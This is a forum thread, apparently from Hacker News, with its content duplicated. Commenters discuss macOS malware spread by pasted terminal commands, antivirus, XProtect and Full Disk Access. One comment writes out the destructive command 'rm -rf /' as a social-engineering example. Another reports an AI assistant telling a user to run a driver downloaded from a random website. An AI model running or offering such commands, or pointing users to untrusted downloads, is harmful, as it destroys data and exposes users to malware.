Comparing to DOS or what? No one runs Win10/11 on FAT now, while NTFS has access permissions and ACLs.
I remember that Win32 apps on Windows 10 and 11 can do whatever they want with the users personal files. Has that changed?
What does that even mean? NTFS file access permissions (35 years old at this point) are far more powerful than 1970s-era Unix permissions model.
It's referring to the fact that Terminal doesn't have free access to all your files and folders, despite what the traditional file access perms say.
He’s talking about sandboxing and permissions prompts
Are we still pushing the myth that anti-malware on Mac isn't necessary?
I support quite a few Mac users and never recommend it myself. Also own a couple Mac’s and don’t use it.
I do occasionally use an app to clean somebody’s Mac of an irritating browser search hijack. I’ve never seen anything else.
Why should I change my mind?
No, that narrative died around 2010. The existence of malware targeting Macs has driven many macOS security improvements since, many of which are taken personally by HN readers.
How does antivirus software protect users who paste malicious commands they find online into the terminal?
By scanning downloaded binaries for known viruses?
A text command pasted into the terminal isn't a binary.
Convincing a Linux user to paste rm -rf / into the terminal is not malware. It's social engineering.
Scanning binaries for known malware is already built into the OS.
Endpoint security software on the Mac, if it's worth the hit to system resources that is, inspect every call to exec and fork that occur in the kernel and also inspect those for known attack vectors, malicious scripts, etc. The one I have installed on my work Mac will kill reverse shell attempts before they are run. Will stop keychain attacks. Infostealing (as they can also get every file system op as they are happening in the kernel).
Gatekeeper and Xprotect are good, but there's only so much they can do.
The article specifically mentions that the methodology here is to trick users into running an obfuscated CLI command…that downloads and runs a binary
Terminal commands have the ability to do dangerous things, like deleting all the user's files.
In this case, the user is warned that the command wants to do something dangerous and must manually allow or deny the action.
It is necessary. That’s why Apple ships a free invisible one bundled into the OS that you never have to think about, see, or update.
XProtect (Apple's built-in antimalware) is usually all you need, as long as you're at least somewhat savvy (and sometimes even if you aren't). I believe installing any additional antimalware on a Mac is a waste of resources.
Actually… I think this be solved by AI answers. I don’t look up commands on random websites, instead I ask an LLM for that kind of stuff. At the very least, check your commands with an LLMs.
Yesterday I was debugging why on Windows, my Wifi would randomly disconnect every couple hours (whereas it worked on Linux). Claude decided it was a driver issue, and proceeded to download a driver update off a completely random website and told me to execute it.
My point is, this is not solved by AI answers.
What we used to have, 15 years ago, was a really well functioning google. You could be lazy with your queries and still find what you wanted in the first two or three hits. Sometimes it was eerily accurate and figuring out what you were actually searching for. Modern google is just not there even with AI answers which is supposed to be infinitely better at natural language processing.
Google was such a revelation after the misery of Alta Vista and kin. I miss the days when I liked them.
Don’t the LLMs get their information from these random websites? They don’t know what is good and what is malware. Most of the time when I get an AI answer with a command in it, there is a reference to a random reddit post, or something similar.
Thanks for reminding me to turn off Full Disk Access for Terminal. I'm not sure why I had that one turned on.
Probably because you can’t even properly `ls` system directories without it.
depends which directories…
What would you do in the terminal without it?
Because it is useless without?
lol, is this serious? The final straw with Mac for me was when I accidentally hit “No” when asked if I wanted to give my terminal access to the file system. All of a sudden I was starting my work day without a working terminal. Obviously there was a solution, probably an easy one, but I didn’t even look for it.
> The final straw with Mac
> Obviously there was a solution, probably an easy one, but I didn’t even look for it
It's hard to take this seriously. It's the most obvious setting possible. Settings > Privacy & Security > Full Disk Access > tick the apps you want to have it.
What's even the complaint here? That Mac has solid app permissions, but you can't be bothered to open the settings?
The solution is to enable Full Disk Access in settings.
Another reason to avoid Medium like cold grits.
This sucks because the web should be the perfect, safe platform for this kind of application, but it isn't. Technically all the features exist in the browser such that you could write a homedir cleaner, space analyzer, etc purely in a browser tab, but because of the misguided (in my opinion) way that browsers refuse to do open a homedir, it's impossible.
I'm not sure letting a webapp access your home is a good idea. You're basically YOLOing random remote code to run on your machine. Maybe we can have it access some specific folder for its own data.
And then there's also Apple which won't allow functional web apps, lest it affects their app store 30% cut.
Seems like a great idea for something to just run inside a chroot jail (or the modern equivalent, a container).
The web already has these APIs, it can be granted read-only permissions to designated directories. But the browsers will refuse to allow you to delegate even read-only access to, for example, the macos ~/Applications folder, on the pretty shaky basis of it being "system files". Because of that policy the API is not useful for the application of a space analyzer.
A solution would be to stop shipping macs with the terminal app\s. Computers are now used by a wide variety of people, some without technical knowledge, maybe a default switch on macOS that displays warnings on rather trivial attacks would help.
GitHub too https://iboostup.com/blog/ai-fake-repositories-github
At least macos has file access permissions.
Comparing to DOS or what? No one runs Win10/11 on FAT now, while NTFS has access permissions and ACLs.
I remember that Win32 apps on Windows 10 and 11 can do whatever they want with the users personal files. Has that changed?
What does that even mean? NTFS file access permissions (35 years old at this point) are far more powerful than 1970s-era Unix permissions model.
It's referring to the fact that Terminal doesn't have free access to all your files and folders, despite what the traditional file access perms say.
He’s talking about sandboxing and permissions prompts
Are we still pushing the myth that anti-malware on Mac isn't necessary?
I support quite a few Mac users and never recommend it myself. Also own a couple Mac’s and don’t use it.
I do occasionally use an app to clean somebody’s Mac of an irritating browser search hijack. I’ve never seen anything else.
Why should I change my mind?
No, that narrative died around 2010. The existence of malware targeting Macs has driven many macOS security improvements since, many of which are taken personally by HN readers.
How does antivirus software protect users who paste malicious commands they find online into the terminal?
By scanning downloaded binaries for known viruses?
A text command pasted into the terminal isn't a binary.
Convincing a Linux user to paste rm -rf / into the terminal is not malware. It's social engineering.
Scanning binaries for known malware is already built into the OS.
Endpoint security software on the Mac, if it's worth the hit to system resources that is, inspect every call to exec and fork that occur in the kernel and also inspect those for known attack vectors, malicious scripts, etc. The one I have installed on my work Mac will kill reverse shell attempts before they are run. Will stop keychain attacks. Infostealing (as they can also get every file system op as they are happening in the kernel).
Gatekeeper and Xprotect are good, but there's only so much they can do.
The article specifically mentions that the methodology here is to trick users into running an obfuscated CLI command…that downloads and runs a binary
Terminal commands have the ability to do dangerous things, like deleting all the user's files.
In this case, the user is warned that the command wants to do something dangerous and must manually allow or deny the action.
It is necessary. That’s why Apple ships a free invisible one bundled into the OS that you never have to think about, see, or update.
XProtect (Apple's built-in antimalware) is usually all you need, as long as you're at least somewhat savvy (and sometimes even if you aren't). I believe installing any additional antimalware on a Mac is a waste of resources.
Actually… I think this be solved by AI answers. I don’t look up commands on random websites, instead I ask an LLM for that kind of stuff. At the very least, check your commands with an LLMs.
Yesterday I was debugging why on Windows, my Wifi would randomly disconnect every couple hours (whereas it worked on Linux). Claude decided it was a driver issue, and proceeded to download a driver update off a completely random website and told me to execute it.
My point is, this is not solved by AI answers.
What we used to have, 15 years ago, was a really well functioning google. You could be lazy with your queries and still find what you wanted in the first two or three hits. Sometimes it was eerily accurate and figuring out what you were actually searching for. Modern google is just not there even with AI answers which is supposed to be infinitely better at natural language processing.
Google was such a revelation after the misery of Alta Vista and kin. I miss the days when I liked them.
Don’t the LLMs get their information from these random websites? They don’t know what is good and what is malware. Most of the time when I get an AI answer with a command in it, there is a reference to a random reddit post, or something similar.
Thanks for reminding me to turn off Full Disk Access for Terminal. I'm not sure why I had that one turned on.
Probably because you can’t even properly `ls` system directories without it.
depends which directories…
What would you do in the terminal without it?
Because it is useless without?
lol, is this serious? The final straw with Mac for me was when I accidentally hit “No” when asked if I wanted to give my terminal access to the file system. All of a sudden I was starting my work day without a working terminal. Obviously there was a solution, probably an easy one, but I didn’t even look for it.
> The final straw with Mac
> Obviously there was a solution, probably an easy one, but I didn’t even look for it
It's hard to take this seriously. It's the most obvious setting possible. Settings > Privacy & Security > Full Disk Access > tick the apps you want to have it.
What's even the complaint here? That Mac has solid app permissions, but you can't be bothered to open the settings?
The solution is to enable Full Disk Access in settings.
Another reason to avoid Medium like cold grits.
This sucks because the web should be the perfect, safe platform for this kind of application, but it isn't. Technically all the features exist in the browser such that you could write a homedir cleaner, space analyzer, etc purely in a browser tab, but because of the misguided (in my opinion) way that browsers refuse to do open a homedir, it's impossible.
I'm not sure letting a webapp access your home is a good idea. You're basically YOLOing random remote code to run on your machine. Maybe we can have it access some specific folder for its own data.
And then there's also Apple which won't allow functional web apps, lest it affects their app store 30% cut.
Seems like a great idea for something to just run inside a chroot jail (or the modern equivalent, a container).
The web already has these APIs, it can be granted read-only permissions to designated directories. But the browsers will refuse to allow you to delegate even read-only access to, for example, the macos ~/Applications folder, on the pretty shaky basis of it being "system files". Because of that policy the API is not useful for the application of a space analyzer.
A solution would be to stop shipping macs with the terminal app\s. Computers are now used by a wide variety of people, some without technical knowledge, maybe a default switch on macOS that displays warnings on rather trivial attacks would help.
[dead]